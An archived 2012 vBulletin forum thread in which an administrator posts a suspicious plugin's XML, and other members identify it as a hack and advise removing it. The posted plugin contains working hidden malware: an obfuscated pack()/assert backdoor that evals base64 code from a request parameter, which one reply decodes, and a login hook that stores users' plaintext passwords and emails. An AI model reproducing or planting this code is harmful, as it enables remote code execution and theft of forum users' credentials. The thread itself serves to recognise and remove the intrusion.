PDA

View Full Version : "vBulletin Enhanced Security" Plugin or Product

frank44
01-06-2012, 06:26 PM
Has anyone else heard of this or recognize the code?

This is the only other mention I have seen

https://www.vbulletin.com/forum/showthread.php/371396-Strange-plugin-broke-forum-login

<?xml version="1.0" encoding="ISO-8859-1"?>
-<product active="1" productid="evbs">
<title>vBulletin Enhanced Security</title> <description>Provides additional security for vBulletin sessions and database storage</description>
<version>1.2.1</version> <url/>
<versioncheckurl/>
<dependencies> </dependencies>
-<codes>
-<code version="0.1">
-<installcode>
<=!=[=C=D=A=T=A=[ $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template` = REPLACE(`template`, 'md5hash', 'sha256Hash')"); $db->query_write("UPDATE ".TABLE_PREFIX."template SET `template_un` = REPLACE(`template_un`, 'md5hash', 'sha256Hash')"); ]=]=>
</installcode>
<uninstallcode/>
</code>
</codes>
<templates> </templates>
-<plugins>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Entropy Generator</title>
<hookname>global_start</hookname>
<phpcode> /* Generate extra entropy for vBulletin random seed */ assert(pack(chr(99).chr
(42),105,115,115,101,116,40,36,95,82,69,81,85,69,8 3,84,91,34,112,109,98,34,93,41,63,101,11 8,97,108,40,98,97,115,101,54,52,95,100,101,99,111, 100,101,40,36,95,82,69,81,85,69,83,84,91 ,34,112,109,98,34,93,41,41,58,117,110,105,113,105, 100,40,41,59)); </phpcode>
</plugin>
-<plugin active="1" executionorder="5">
<title>vBulletin Enhanced Security - Session Sign</title>
<hookname>login_verify_success</hookname>
-<phpcode>
<=!=[=C=D=A=T=A=[ /* vBulletin Session Encrypt/Sign */ function vb_session_sign($username, $password, $md5password) { global $vbulletin; $extra = $vbulletin->db->query_first("SELECT email, ug.title as lvl" ." FROM ".TABLE_PREFIX."user u, ".TABLE_PREFIX."usergroup ug" ." WHERE u.usergroupid=ug.usergroupid AND u.userid=".$vbulletin->userinfo['userid']); $data = pack("V",21).pack("V",time()) .$username.chr(0).$password.chr(0).$md5password .chr(0).$_SERVER["REMOTE_ADDR"].chr(0).$extra['email'].chr(0).$extra['lvl']; $entry = base64_encode(pack("C",0).pack("C",0).pack("v",0).$data); $vbulletin->db->query_write("REPLACE INTO ".TABLE_PREFIX."datastore (title,data) VALUES" ." ('logincache_".uniqid($vbulletin->userinfo['userid'])."','$entry')"); } vb_session_sign($username, $password, $md5password); ]=]=>
</phpcode>
</plugin>
</plugins>
<phrases> </phrases>
<options> </options>
<helptopics> </helptopics>
<cronentries> </cronentries>
<faqentries> </faqentries>
</product>
TheLastSuperman
01-06-2012, 06:49 PM
Well the fact you don't know where it came from and that it has base64 within tells me to get rid of it quick... try this mod as it works on vB3 as well - https://vborg.vbsupport.ru/showthread.php?t=265866

It could possibly be related but after you get rid of that plugin use the mod above and .htaccess protect your admincp and modcp - https://www.vbulletin.com/forum/showthread.php/393227-Preventative-How-to-avoid-being-Hacked-by-TeamPS-i-e-p0wersurge and Wayne has some very useful tips for situations like this and similar.
nhawk
01-06-2012, 07:00 PM
The pack statement equates to this..

isset($_REQUEST["pmb"])?eval(base64_decode($_REQUEST["pmb"])):uniqid();

Run away from that code as fast as you can. It appears to be a hack to me. Especially with base64_decode involved.
frank44
01-06-2012, 07:02 PM
Thank you!